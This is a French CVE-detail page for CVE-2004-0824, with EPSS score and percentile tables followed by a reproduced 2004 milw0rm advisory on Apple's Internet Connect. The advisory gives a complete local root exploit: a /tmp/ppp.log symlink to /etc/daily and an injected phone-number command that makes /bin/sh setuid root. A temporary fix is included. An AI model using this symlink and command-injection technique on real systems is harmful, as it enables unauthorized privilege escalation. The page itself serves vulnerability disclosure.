CVE-2004-0824 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.92%	–	–
2022-02-13	–	–	1.92%	–	–
2022-04-03	–	–	1.92%	–	–
2022-06-26	–	–	1.92%	–	–
2022-11-13	–	–	1.92%	–	–
2022-11-20	–	–	1.92%	–	–
2022-12-11	–	–	1.92%	–	–
2022-12-18	–	–	1.92%	–	–
2022-12-25	–	–	1.92%	–	–
2023-01-01	–	–	1.92%	–	–
2023-02-12	–	–	1.92%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.28%
2025-03-18	–	–	–	–	0.28,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	55%
2022-02-13	56%
2022-04-03	76%
2022-06-26	77%
2022-11-13	78%
2022-11-20	77%
2022-12-11	78%
2022-12-18	77%
2022-12-25	78%
2023-01-01	77%
2023-02-12	78%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	49%
2025-03-18	49%

Date: 25.07.2004 Author: B-r00t. 2004. Email: B-r00t <br00t blueyonder co uk> Vendor: Apple Operating System: OSX Panther (Possibly Previous Versions). Application: Internet Connect.app Tested: Panther 10.3.4 (Internet Connect v1.3) Problem: Internet Connect allows any file on the file system to be altered. Status: 0day! - Temporary Fix Included. Description: Apples Internet Connect application creates a 'ppp.log' file in '/tmp/'. If the file already exists it is opened in append mode. If it does not exist a new file is created. It is possible to trick Internet Connect into appending data to any file on the filesystem by creating a symlink file '/tmp/ppp.log' pointing to the file to be altered. If the file '/tmp/ppp.log' already exists, the attack is not possible as the file is owned by user 'root' and group 'wheel': - $ ls -l /tmp/ppp.log -rw-r--r-- 1 root wheel 807 24 Jul 23:44 /tmp/ppp.log However, due to the Operating System clearing the '/tmp' directory during system startup and also on a regular basis due to system maintenance, it becomes possible to form the attack as shown below: First a file is created to represent a system file, owned and only writable by user 'root'. maki:~ # echo "TEST" > /etc/file_owned_by_root maki:~ # ls -l /etc/file_owned_by_root -rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/ file_owned_by_root maki:~ # cat /etc/file_owned_by_root TEST A symlink is now created in the '/tmp' directory to point to the file to be altered. It is important to realise that the link can be created as a none 'admin' or 'root' user. maki:/tmp $ id uid=502(br00t) gid=502(br00t) groups=502(br00t) maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log maki:/tmp $ ls -l ./ppp.log lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> / etc/file_owned_by_root Now Internet Connect is opened. Under 'configuration' choose 'Other'. Enter some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'. 'Cancel' can be clicked several seconds later. Checking the original file '/etc/file_owned_by_root' we see the following: - maki:~ $ cat /etc/file_owned_by_root TEST Sun Jul 25 00:20:42 2004 : Version 2.0 Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld! Sun Jul 25 00:20:54 2004 : Terminating on signal 15. Sun Jul 25 00:20:58 2004 : Serial link disconnected. As can be seen, data has been appended to the 'protected' file. Impact: It is possible for a local user to escalate their privileges by appending data to specific system files. In addition, a malicious user may be able to render the machine unusable by corrupting important system files. Exploit: This demonstration appends commands to the '/etc/daily' file which is executed by default at 3:15AM each day. An alternative attack might involve appending to any of the files that are sourced at system start up such as '/etc/rc.common'. This latter method is convenient if the user is able to reboot the machine. Create our link maki:~ $ ln -s /etc/daily /tmp/ppp.log Open Internet Connect. Internal Modem -> Configuration -> Other Internet Connect only allows certain characters to be used for the telephone number. The background '&' character allows our command string to execute amongst the time and date strings also appended. Telephone Number: & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh & Click 'Connect' ...*wait (10secs) ... 'Cancel' Check the '/etc/daily' file. maki:~ $ tail /etc/daily if [ -f /etc/security ]; then echo "" echo "Running security:" sh /etc/security 2>&1 | sendmail root fi Sun Jul 25 03:10:11 2004 : Version 2.0 Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh & Sun Jul 25 03:10:15 2004 : Terminating on signal 15. Sun Jul 25 03:10:17 2004 : Serial link disconnected. Now sit back and wait for cron to execute '/etc/daily' at 03: 15AM. maki:~ $ date Sun Jul 25 03:13:43 CEST 2004 maki:~ $ cd /bin maki:/bin $ ls -l sh -r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh* maki:/bin $ date Sun Jul 25 03:15:50 CEST 2004 maki:/bin $ ls -l sh -rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh* maki:/bin $ sh maki:/bin # id uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t) All thats left to do is clean up '/etc/daily' and remove the link '/tmp/ppp.log' FIX: The following commands serve to provide a temporary fix until Apple release an official update. Open a terminal: /Applications/Utilities/Terminal.app Gain root access using 'sudo': maki:~ $ sudo sh Password:[YOUR PASSWORD] maki:~ # whoami root You can copy and paste the following commands: - /usr/bin/touch /tmp/ppp.log echo '/usr/bin/touch /tmp/ppp.log' >> /etc/daily echo '/usr/bin/touch /tmp/ppp.log' >> /etc/rc.common These commands ensure that a '/tmp/ppp.log' file is present to prevent a user from creating a link as shown above. Alternatively the line: /usr/bin/touch /tmp/ppp.log can be added to each file '/etc/daily' and '/etc/rc.common' manually using an editor and root privileges. Shoutz: Marshal-L, Ruxsaw, Haggis & Kraft. s1, Blex & the old #cheese posse (RIP). Maz ... Good Luck For The Wedding! # milw0rm.com [2004-07-28]